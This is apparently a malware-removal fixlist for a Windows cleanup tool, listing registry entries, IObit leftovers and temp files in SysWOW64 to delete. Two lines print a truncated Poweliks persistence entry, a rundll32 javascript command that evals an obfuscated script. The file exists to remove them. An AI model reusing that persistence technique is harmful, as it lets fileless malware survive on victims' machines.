CloseProcesses:
HKU\S-1-5-21-1466444306-1903263773-3823580658-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer64.dll No File
BHO-x32: Ads Removal -> {9D974C8C-6D92-44FB-BEAF-B45A1C0CF17F} -> C:\Program Files (x86)\IObit\IObit Malware Fighter\adsremoval\IE\Adblock.dll No File
R4 RegFilter; \??\C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\regfilter.sys [X]
2014-11-08 14:00 - 2014-11-08 14:00 - 00000000 ____D () C:\Users\Owner\AppData\Roaming\ProductData
2014-11-08 13:59 - 2014-11-08 13:59 - 00000000 ____D () C:\ProgramData\ProductData
2014-11-08 13:59 - 2014-11-08 13:59 - 00000000 ____D () C:\ProgramData\{E1ED556E-3EA0-4F44-8BE7-CC5FB0F4B424}
2014-11-08 13:59 - 2014-11-08 13:59 - 00000000 ____D () C:\ProgramData\{D76294E6-03B8-4971-AF2E-3F846161A690}
2014-11-08 13:57 - 2014-11-08 13:59 - 00000000 ____D () C:\Users\Owner\AppData\Roaming\IObit
2014-11-08 13:57 - 2014-11-08 13:59 - 00000000 ____D () C:\Program Files (x86)\IObit
2014-11-08 13:56 - 2014-11-08 13:57 - 00000000 ____D () C:\ProgramData\IObit
2014-11-15 14:05 - 2014-10-15 20:55 - 00000000 ___HD () C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
CustomCLSID: HKU\S-1-5-21-1466444306-1903263773-3823580658-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-1466444306-1903263773-3823580658-1001_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\ifsdrives.dll (Microsoft Corporation)
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00030956.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00030237.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00027441.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00027036.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00026544.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00025239.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00024990.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00024945.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00024864.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00023120.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00021883.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00021364.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00020050.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00019970.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00019913.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00017745.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00016756.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00016515.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00016017.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00015328.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00014575.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00013972.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00012990.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00012938.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00011369.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00008658.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00008344.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00007606.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00005149.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00002323.tmp
2014-11-11 22:29 - 2014-11-11 22:29 - 01180264 ____T () C:\Windows\SysWOW64\00000973.tmp
2014-11-11 22:28 - 2014-11-11 22:28 - 40034920 ____T () C:\Windows\SysWOW64\00029760.tmp
2014-11-11 22:28 - 2014-11-11 22:28 - 40034920 ____T () C:\Windows\SysWOW64\00024842.tmp
2014-11-11 22:28 - 2014-11-11 22:28 - 40034920 ____T () C:\Windows\SysWOW64\00024590.tmp
2014-11-11 22:23 - 2014-11-11 22:23 - 01180264 ____T () C:\Windows\SysWOW64\00028703.tmp
2014-11-11 22:23 - 2014-11-11 22:23 - 01180264 ____T () C:\Windows\SysWOW64\00023811.tmp
2014-11-11 22:23 - 2014-11-11 22:23 - 01180264 ____T () C:\Windows\SysWOW64\00009894.tmp
2014-11-11 22:22 - 2014-11-11 22:22 - 40034920 ____T () C:\Windows\SysWOW64\00005705.tmp
2014-11-11 22:22 - 2014-11-11 22:22 - 01180264 ____T () C:\Windows\SysWOW64\00028145.tmp
2014-11-11 22:22 - 2014-11-11 22:22 - 01180264 ____T () C:\Windows\SysWOW64\00021726.tmp
2014-11-11 22:22 - 2014-11-11 22:22 - 01180264 ____T () C:\Windows\SysWOW64\00012382.tmp
2014-11-11 22:22 - 2014-11-11 22:22 - 01180264 ____T () C:\Windows\SysWOW64\00011942.tmp
2014-11-11 22:22 - 2014-11-11 22:22 - 01180264 ____T () C:\Windows\SysWOW64\00011538.tmp
2014-11-11 22:22 - 2014-11-11 22:22 - 01180264 ____T () C:\Windows\SysWOW64\00009961.tmp
2014-11-11 22:22 - 2014-11-11 22:22 - 01180264 ____T () C:\Windows\SysWOW64\00005447.tmp
2014-11-11 22:22 - 2014-11-11 22:22 - 01180264 ____T () C:\Windows\SysWOW64\00005436.tmp
2014-11-11 22:22 - 2014-11-11 22:22 - 01180264 ____T () C:\Windows\SysWOW64\00004827.tmp
2014-11-11 22:22 - 2014-11-11 22:22 - 01180264 ____T () C:\Windows\SysWOW64\00003902.tmp
2014-11-11 22:22 - 2014-11-11 22:22 - 01180264 ____T () C:\Windows\SysWOW64\00002995.tmp
2014-11-11 22:22 - 2014-11-11 22:22 - 01180264 ____T () C:\Windows\SysWOW64\00001869.tmp
2014-11-11 22:22 - 2014-11-11 22:22 - 01180264 ____T () C:\Windows\SysWOW64\00000491.tmp
2014-11-11 22:22 - 2014-11-11 22:22 - 01180264 ____T () C:\Windows\SysWOW64\00000292.tmp
2014-11-11 22:22 - 2014-11-11 22:22 - 01180264 ____T () C:\Windows\SysWOW64\00000153.tmp
S2 LiveUpdateSvc; C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe [2151744 2014-01-06] (IObit)
2014-11-14 21:45 - 2014-11-14 21:45 - 06000640 _____ () C:\Program Files (x86)\GUTACDA.tmp
2014-11-14 21:45 - 2014-11-14 21:45 - 00000000 ____D () C:\Program Files (x86)\GUM874F.tmp
2014-11-13 20:41 - 2014-11-13 20:42 - 00000000 ____D () C:\Program Files (x86)\GUMC4F.tmp
2014-11-13 20:41 - 2014-11-13 20:41 - 06000640 _____ () C:\Program Files (x86)\GUT13A0.tmp
EmptyTemp: